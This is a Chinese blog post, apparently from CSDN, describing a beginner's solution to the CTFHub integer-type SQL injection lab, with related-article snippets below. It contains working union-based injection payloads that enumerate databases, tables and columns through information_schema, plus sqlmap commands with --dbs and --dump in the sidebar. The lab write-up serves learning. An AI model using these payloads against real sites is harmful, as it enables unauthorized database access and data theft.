Ctfhub-sql注入【整数型】

最新推荐文章于 2024-03-01 08:00:00 发布
最新推荐文章于 2024-03-01 08:00:00 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: CTF学习系列 文章标签: sql 数据库 sqlserver web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/soysauce123/article/details/126132626
版权

从0开始学CTF[Web篇]

Ctfhub-sql注入【整数型】

哟哟哟~又见面了各位咱今天深入一小波开始学一学sql注入
以ctfhub的这道题目为例子
在这里插入图片描述
身为一名小白我们先预习一下今天要用到的知识

  1. union select
  2. order by
  3. database() 查询当前所在的库名
  4. group_concat(schema_name) from information_schema.schemata 显示所有数据库的名称
  5. select table_name from information_schema.tables where table_schema='name' limit x,x; 查询单个数据库中的第几个表名
  6. select table_name from information_schema.tables where table_schema='name'; 查询一个数据可中的所有表名
  7. group_concat(column_name) from information_schema.columns where table_schema=‘表名’ and table_name=‘字段名’ 获取表明中的字段名
  8. group_concat(表名) from 库名.字段名
    欧克 这就是我们大概会用到的相关函数
    那么我们就可以开始做题了
    一开始登入网址可看到
    在这里插入图片描述
    大家可以随便尝试输入一些东西
    可以观察是否返回成功
    开始运用

order by

先尝试看看一共有几列,当道三的时候发现不返回了说明只有两列
在这里插入图片描述
再用

union select

合并
接下来就可以查询一下我们现在在什么库
用到

database()

在这里插入图片描述
欸,发现我们在sqli里面
然后我们再尝试看看一共有什么库用到

group_concat(schema_name) from information_schema.schemata

在这里插入图片描述
发现有老多库了,我们就大胆猜测从我们本来就在的库里面查找
然后可以查询所有的表头

select table_name from information_schema.tables where
table_schema=‘sqli’ ;

发现了
在这里插入图片描述
我们肯定要的是flag里面的数据对吧
于是使用函数获得此表里面的带有flag的字段名

group_concat(column_name) from information_schema.columns where table_schema=‘sqli’ and table_name=‘flag’

这样我们就很清楚一个库的库名,表名和字段名就可以直接查找里面的数据

group_concat(flag) from sqli.flag

最后得到在这里插入图片描述
然后我们就可以输入flag通过本题啦
小白承认这题对于我来说是一个练手的题目【嘿嘿】
感谢大家支持有问题欢迎大家提出

酱油牌酱油菌
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFHub_SQL整数型注入(超详解)
weixin_47443077的博客
07-26 1035
CTFHub_SQL整数型注入(超详解) 相信这个过程会帮助你理解sql注入! 首先打开环境 先尝试手注,已经说明是整数型,就直接查看字段数: -1 order by 1# -1 order by 2# -1 order by 3# 发现在第三步的时候没有回显,说明字段数是2。 接着判断显示位: -1 union select 1,2# 然后查看数据库: -1 union select database(),2# 接着获取sqli数据库中的表: -1 union select 1,grou
CTFHub - 整数型注入
Have_a_great_day的博客
09-07 364
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHub | 整数型注入
尼泊罗河伯的博客
10-25 2431
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
CTFHUB-SQL注入-整数型注入(一)
最新发布
sev1n的博客
03-01 2173
后端SQL查询语句拼接了前端传递的参数,前端输入恶意的字符,打断了原有sql语句,实现了恶意的查询结果学的不够深入,理解的不够透彻,还是看了一些题解还是需要多练多学多看1.知识点整数型注入(1)检查是否存在注入and 1=1 返回正确and 1=2 返回错误(2)猜字段数order by x(x为数字)得出字段数(3)爆数据库名?得到数据库名称sqli(4)爆表名?得到表名 news,flag(5)爆列名?得到字段名flag(6)爆字段内容(flag)?
CTFhub-sql-整数注入
ssss39的博客
08-21 485
因为 1=1 为真,1=2 为假,且 1=1 与 1 显示的数据一样,那么就存在 sqli 注入
10-sql注入-mysql注入1
08-03
1.路径符号:要用双斜杠 \\ ,或者 / 2.转换为十六进制数,这样就不需要引号了 1.报错显示 3.遗留文件 phpinfo info test php 5
php登录页面实现-SQL注入
03-07
php登录页面实现-SQL注入
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入的渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹...
SQLmap-SQL注入
03-12
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问...
CTFHUB-整数型SQL注入
xixihahawuwu的博客
12-24 4190
CTFHUB-整数型SQL注入 根据提示输入1后发现页面回显并且url改变。由题可知此题为整数型注入 使用order by语句查询字段数 参数为3时不回显,说明字段数为2 使用union联合查询检测信息回显位置 id=1 union select 1,2 由于页面只允许返回一行内容,所以我们修改参数1为-1,使需要查询的信息回返 id=-1 union select 1,2 id=-1 union select 1,database() 获取当前数据库名 id=-1 union select 1,
CTFHub SQL 整数型注入
weixin_44732566的博客
02-16 3250
CTFHub SQL 整数型注入 之前那道整数型注入题改了,,,但还是一样的套路,数据库也一样,就多了一个:前端页面回显位置只有两处,而且一个正确的id回显就占了两处地方 UI界面好看了,还多了一个问题,就是前端页面一次只显示一条数据库记录 所以在payload最后加上limit x offset y 这个意思是从第y条记录开始后x条记录,y是从0开始算的 1 or 1=1 limit 1 o...
CTFHub SQL注入 整数型注入
weixin_44732566的博客
02-12 3731
CTFHub SQL注入 整数型注入 强烈推荐这个网站 CTFhub https://www.ctfhub.com/ 分各个类别,题目由易到难 这题还是很基础的,有各种提示 打开是源码,?id=处存在注入 /?id=1 or 1=1 然后就是爆数据库名,information_schema三步 以下是详细步骤: ?id=1 or 1=1 union select 1,database() ...
ctfhub SQL 整数型注入
qq_52671379的博客
06-21 311
SQL 整数型注入 题目 当输入值为1或2时有回显 当输入3时无回显 判断是否存在注入 加单引号 对应的id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,无回显。 作为sql注入的小白,我决定不采用大佬们的方法,看不懂,先分享自己的方法,非常传统。 由以上得知有两个字段,所以第一步,爆库名; '' union select 1,database() # 第二,爆表名; '' union select 1,group_concat(table_name) from information_
ctfhubSQL整数型注入(借助sqlmap工具)
hwy2506451901的博客
04-05 993
关于这道题呢,我还没有看到用sqlmap工具解答的,正好刚刚做完,感觉还挺简单的,所以决定分享一下过程,大佬可以绕过啦嘿嘿嘿,大家也可以去下载一个试试这个工具,希望能有一点帮助吧! 我们启动环境,进入网址看到让我们输入一个1试试,那我们就输入试试吧 可以看到我们输入的id写在了地址栏当中,说明采用的提交方式是get,下面就详细介绍这道题采用sqlmap的解法: 1.检查是否存在漏洞: 将地址栏的...
CTFHub-web(SQL整数型注入)
分享与记录
03-26 387
上题 按照提示输入1 尝试知道有几个字段,先传入1 order by 2,回显正常 然后1 order by 3,根据回显可得知只有两个字段 找注入点 得知1,2均为注入点 知道了当前数据库名,便可查询出表名 0 union select 1,group_concat(table_name) from information_schema.tables where table_sche...
[CTFHub]整数型注入webSQL注入
ZXW_NUDT的博客
05-12 288
输入1后发现url改变 使用order by语句查询字段数 使用union联合查询检测信息回显位置 由于页面只允许返回一行内容,所以则修改参数1为-1,使需要查询的信息回返 获取当前数据库名 获取所有数据库名 查询数据库sqli表名 获取flag列所有字段名 获取指定数据库的表的列的内容 ...
CTF hub 整数型注入
m0_63253040的博客
02-24 1197
尝试输入1,发现有回显 题目给出了查询语句,为整数型,再验证下 判断为整数型没错,若为字符型,则 select * from news where id = '1 and 1=1' select * from news where id = '1 and 1=2' 不会出现上述结果。 爆字段 发现2正常回显 3不显,只有2个字段 再看看数据库sqli 3 union select 1,database() //3是为了先保证之前的数据查不出来 ...
CTFHUBsql注入
Vesperrrrrrr的博客
11-02 108
sqlmap 自动注入: 因为这道题之前俺写过,当时用的 sqlmap 自动注入,具体就三条语句: python sqlmap.py -u "" --cookie "id=1" --dbs --level 2 python sqlmap.py -u "" --cookie "id=1" -D sqli --tables --level 2 python sqlmap.py -u "" --cookie "id=1" -D sqli -T frkadyqcec --columns --dump --l
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

酱油牌酱油菌

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值